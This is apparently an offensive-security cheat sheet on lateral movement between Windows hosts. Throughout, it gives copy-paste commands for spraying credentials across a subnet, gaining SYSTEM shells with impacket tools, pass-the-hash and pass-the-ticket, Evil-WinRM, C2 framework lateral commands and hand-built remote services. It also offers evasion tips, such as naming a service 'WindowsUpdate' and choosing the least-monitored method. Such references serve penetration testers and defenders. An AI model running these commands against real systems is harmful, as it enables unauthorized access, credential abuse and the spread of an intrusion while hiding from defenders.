Lateral Movement

Move from one Windows host to the next. Most techniques need creds (or NTLM hash, or Kerberos ticket). Tickets and trust attacks live in AD MOC .

T=10.10.11.50
USER=Administrator
PASS='Passw0rd!'
NTHASH='8846f7eaee8fb117ad06bdd830b7586c'
DOMAIN=corp.local

i. Decision matrix #

What you have -> what to use:

What’s open on the target -> what to use:

ii. NXC, the swiss army knife #

Spray a cred set across many hosts at once:

nxc smb 10.10.11.0/24 -u "$USER" -p "$PASS"
nxc smb 10.10.11.0/24 -u "$USER" -H "$NTHASH"
nxc smb 10.10.11.0/24 -u "$USER" -p "$PASS" --local-auth     ## local account, not domain

Pwned indicators:

• [+] with (Pwn3d!) = you’re admin on that host
• [+] without (Pwn3d!) = creds valid but no admin

Once you have admin, execute commands directly:

nxc smb "$T" -u "$USER" -p "$PASS" -x "whoami"
nxc smb "$T" -u "$USER" -H "$NTHASH" -X "Get-Process"     ## PowerShell
## Spawn full shell:
nxc smb "$T" -u "$USER" -p "$PASS" --exec-method smbexec -x cmd

WinRM mode:

nxc winrm "$T" -u "$USER" -p "$PASS"
nxc winrm "$T" -u "$USER" -p "$PASS" -x "whoami"

iii. PsExec via impacket #

Creates a service on the target that runs your command as SYSTEM. Very loud (creates EVID 7045 service install) but reliable.

impacket-psexec "$DOMAIN/$USER":"$PASS"@"$T"
impacket-psexec -hashes :"$NTHASH" "$DOMAIN/$USER"@"$T"

With a custom service name to be less obvious:

impacket-psexec -service-name "WindowsUpdate" "$DOMAIN/$USER":"$PASS"@"$T"

iv. SMBExec (psexec without dropping a binary) #

Uses cmd.exe redirection to talk through SMB pipes. No service binary on disk:

impacket-smbexec "$DOMAIN/$USER":"$PASS"@"$T"
impacket-smbexec -hashes :"$NTHASH" "$DOMAIN/$USER"@"$T"

Quieter than psexec, slightly less stable.

v. WMIExec #

DCOM-based, no service install, no SMB pipe. Often slips past where SMB-based fails:

impacket-wmiexec "$DOMAIN/$USER":"$PASS"@"$T"
impacket-wmiexec -hashes :"$NTHASH" "$DOMAIN/$USER"@"$T"

Needs port 135 + dynamic high port range open. Often the most stealth-friendly of the impacket bunch.

vi. AtExec (Task Scheduler) #

Spawns a scheduled task, runs it once, deletes it. Useful when WMI is blocked:

impacket-atexec "$DOMAIN/$USER":"$PASS"@"$T" "whoami"
impacket-atexec -hashes :"$NTHASH" "$DOMAIN/$USER"@"$T" "whoami"

Non-interactive, returns command output only.

vii. DCOMExec #

Same idea as WMI but via different DCOM objects (MMC20, ShellWindows, ShellBrowserWindow):

impacket-dcomexec "$DOMAIN/$USER":"$PASS"@"$T"
impacket-dcomexec -object ShellWindows "$DOMAIN/$USER":"$PASS"@"$T"

Tries multiple DCOM objects automatically. Useful when one is blocked.

viii. Evil-WinRM (PSRemoting) #

The cleanest Windows-to-Windows feel. Real PowerShell session, no service install, no scheduled task:

evil-winrm -i "$T" -u "$USER" -p "$PASS"
evil-winrm -i "$T" -u "$USER" -H "$NTHASH"

Built-in helpers inside the shell:

*Evil-WinRM* PS> upload /local/file C:\Windows\Temp\file
*Evil-WinRM* PS> download C:\Windows\Temp\file /local/file
*Evil-WinRM* PS> menu                          ## load PS modules
*Evil-WinRM* PS> Invoke-Binary /local/sh.exe   ## run binary from local disk on remote box

If 5985 is filtered, try 5986 (HTTPS):

evil-winrm -i "$T" -u "$USER" -p "$PASS" -S -P 5986

ix. Pass-the-Hash (PtH) #

Use NTLM hash instead of password. Works with most of the above (impacket, nxc, evil-winrm). RDP requires Restricted Admin Mode enabled on target:

xfreerdp /v:"$T" /u:"$USER" /pth:"$NTHASH" /restricted-admin /dynamic-resolution

Check if Restricted Admin is enabled:

nxc smb "$T" --rid-brute   ## checks include this on modern nxc
## or directly:
nxc rdp "$T" -u "$USER" -H "$NTHASH"

x. Pass-the-Ticket (PtT) #

When you have a Kerberos TGT or TGS in .ccache format, point impacket at it with -no-pass -k:

export KRB5CCNAME=/tmp/user.ccache
impacket-psexec -k -no-pass "$DOMAIN/$USER"@host.corp.local
impacket-wmiexec -k -no-pass "$DOMAIN/$USER"@host.corp.local

You must reference the host by FQDN (Kerberos is hostname-based), not by IP.

From Windows with Rubeus (PtT in-memory):

Rubeus.exe ptt /ticket:base64encodedticket
klist

Full Kerberos abuse chain lives in AD MOC .

xi. Lateral via RDP #

If you have GUI access and don’t want to drop tools, RDP with creds:

xfreerdp /v:"$T" /u:"$USER" /p:"$PASS" /dynamic-resolution /drive:share,/tmp

/drive:share,/tmp mounts your /tmp as a share on the target so you can copy files in/out via the RDP channel.

Hash auth (Restricted Admin only):

xfreerdp /v:"$T" /u:"$USER" /pth:"$NTHASH" /restricted-admin

xii. Sliver / Cobalt Strike / Havoc lateral #

C2 frameworks have built-in lateral commands using the same primitives:

sliver > psexec --hostname target
sliver > wmi --hostname target --command "whoami"
beacon> jump psexec64 target session
beacon> remote-exec wmi target whoami

These wrap impacket/PowerShell with the C2’s session injection so the lateral spawn is already a beacon. Best option on real engagements when you’ve got the infra.

xiii. SCM remote service create (manual) #

When automated tools fail and you have admin via SMB, build a service by hand:

sc.exe \\target create newsvc binPath= "C:\Windows\Temp\sh.exe" start= auto
sc.exe \\target start newsvc
sc.exe \\target delete newsvc

xiv. PowerShell remoting one-off #

When you don’t want a full evil-winrm session:

$cred = New-Object PSCredential ("$DOMAIN\$USER", (ConvertTo-SecureString "$PASS" -AsPlainText -Force))
Invoke-Command -ComputerName "$T" -Credential $cred -ScriptBlock { whoami; hostname }
Enter-PSSession -ComputerName "$T" -Credential $cred

xv. Watch what you trigger #

Lateral activity is logged everywhere. Quick reference of what each method generates:

On real engagements, pick the method based on what’s least monitored. On labs, pick what’s most reliable.

xvi. After lateral, repeat #

You moved to a new box. Start over at Local Enum , dump creds with PrivEsc - Credentials & Files , find more lateral targets. The lateral loop continues until you reach the goal (DA, domain trust, etc).

See AD MOC for the AD-specific lateral patterns (DCSync, ACL chains, delegation).